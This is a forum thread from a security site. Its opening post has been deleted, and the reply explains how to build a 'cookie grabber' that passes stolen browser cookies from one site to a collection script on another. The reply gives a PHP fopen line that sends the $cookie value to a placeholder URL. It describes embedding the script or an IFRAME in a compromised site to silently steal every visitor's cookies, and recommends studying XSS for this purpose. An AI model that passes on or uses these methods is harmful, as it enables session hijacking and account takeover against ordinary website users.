UGN Security Forums
My ProfileMember DirectoryLogin
Search our ForumsView our FAQView our Site Rules
View our CalendarView our Active TopicsGo to our Main Page

UGN Security Store
 

Network Sites UGN Security, The GoNix Initiative, Elite Web Gamers, Back of the Web, EveryDay Helper, VNC Web Design & Development
September
Su M Tu W Th F Sa
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30
Sponsored Links
Latest Postings
The History Thread...
by Gremelin
09/18/14 09:42 AM
Doom 3
by Cyrez
09/11/14 08:58 PM
Amazon Gift Card Generator/KeyGen?te
by Gecko666
08/22/14 09:21 AM
Latest Reviews
Topic Options
Rate This Topic
#19395 - 02/09/06 04:18 AM *DELETED*
Bronavich Offline
Junior Member

Registered: 01/18/06
Posts: 8
Loc: England
Post deleted by Bronavich


Edited by Bronavich (10/27/06 03:00 PM)

Top
Sponsored Links
      
#19396 - 02/10/06 09:02 PM Re: A cookie grabber without redirection?
Happy Birthday Ghost Offline


Registered: 06/16/03
Posts: 807
Loc: Wisconsin
Ok, here's my understanding of the scenario. You have the cookie grabbing script on site A, and want it to be saved on the server hosting site B. If this is the case, you would have to have site A host some sort of script to forward all of the necessary information that the browser sends to the server at site A, and have a script setup on site B to write the information it recieves to a text file. If all you're interested in is the cookie, you could easily write a script to request the script at site B, sending the cookie. This would be accomplished somewhere along the lines of:
Code:
fopen("http://www.sitename.tld/path/to/file/scriptname.php?str=$cookie", "r");
In fact, all the script at site A would need to do in this case is to recieve the cookie you want to steal via a GET or COOKIE variable ($_GET or $_COOKIE depending on how you want to do it) and use define the $cookie variable in the fopen function.

Now, the question of embedding it into a page is another story. If you were to actually gain access to a file, you could add the script at site A's code to a page on the target site and, using $_COOKIE, silently steal the cookie of every visitor to that site. You could also upload the script onto the target site in question and add the IFRAME html tag into any page there, and if you had a user view it, their browser would request the script, and send the applicable cookies.

Of course, you need to understand, you can't 'embed' a remote script into the site via IFRAME because browsers will only send cookies to the site domain the cookie is set to be sent to. Also, with the first option, if the PATH of a cookie is set, it will only send the cookie to a script in the PATH that the cookie is instructed to be sent to. This is why 'cookie stealing' is more complicated than writing a simple script (hence the name cookie grabber for my script).

If you really want to steal cookies, you should look into XSS, javascript, HTML, the HTTP RFC, and how cookies are used by browsers.

As far as PHP functions you should be concerned with, start with...

fopen()
fread()
fwrite()
while()
for()
header()
explode()
implode()
foreach()
array()
setcookie()

and the global variables $_GET and $_COOKIE

I'm not sure I understand your comprehension of the $_COOKIE variable. By specifying no cookie name in the cookie variable, you will not return any value. The $_COOKIE variable is an array.
_________________________
[[ GamerSupport ] [ UGN Security ] [ Evil Hosting ] [ Comic Relief ]
~[Ghost]

Top

Moderator:  §intå×, Gremelin 
Featured Member
Registered: 02/28/02
Posts: 7193
Forum Stats
2148 Members
46 Forums
34502 Topics
69672 Posts

Max Online: 1567 @ 04/25/10 02:20 AM
Top Posters
UGN Security 27664
Gremelin 7193
§intå× 3255
SilentRage 1273
Ice 1146
pergesu 1136
Infinite 1041
jonconley 955
Girlie 908
unreal 860
Newest Members
Tim050, Gecko666, defghi795767, Devo60, ali
2148 Registered Users
Who's Online
1 registered (Cyrez), 415 Guests and 313 Spiders online.
Key: Admin, Global Mod, Mod
Latest News


Donate
  Get Firefox!
Get FireFox!